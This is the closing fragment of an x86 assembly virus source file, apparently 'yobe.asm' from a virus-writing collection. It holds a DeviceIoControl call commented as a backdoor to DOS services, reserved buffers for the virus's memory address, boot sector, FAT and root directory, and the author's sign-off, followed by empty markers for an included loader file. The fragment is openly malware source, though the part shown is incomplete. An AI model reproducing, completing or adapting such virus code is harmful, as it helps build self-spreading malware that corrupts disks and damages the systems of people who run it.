	call DeviceIoControl			;backdoor used to call DOS services
	xchg eax, ecx				;error?
	jecxz q2526h				;yeah, set CF and quit
	clc					;clear CF
	ret					;quit
q2526h:	stc					;set CF
	ret					;and quit


	loader:					;DOS loader
	include	loader.inc
	ldrsize = $-loader			;size of DOS loader
	membase	dd	'YYYY'		;address, where is virus placed in memory
	filename	db	100h dup ('Y')	;filename
	save	db	512 dup ('Y')		;save area
	BOOT	db	512 dup ('Y')		;BOOT
	FAT	db	4608 dup ('Y')		;FAT
	ROOT	db	7168 dup ('Y')		;ROOT
virus_end:					;virus ends here
ends						;end of code section
End Start					;thats all f0lx ;)
;----------------------------------------------------------------[yobe.asm]---
;--------------------------------------------------------------[LOADER.INC]---
;--------------------------------------------------------------[LOADER.INC]---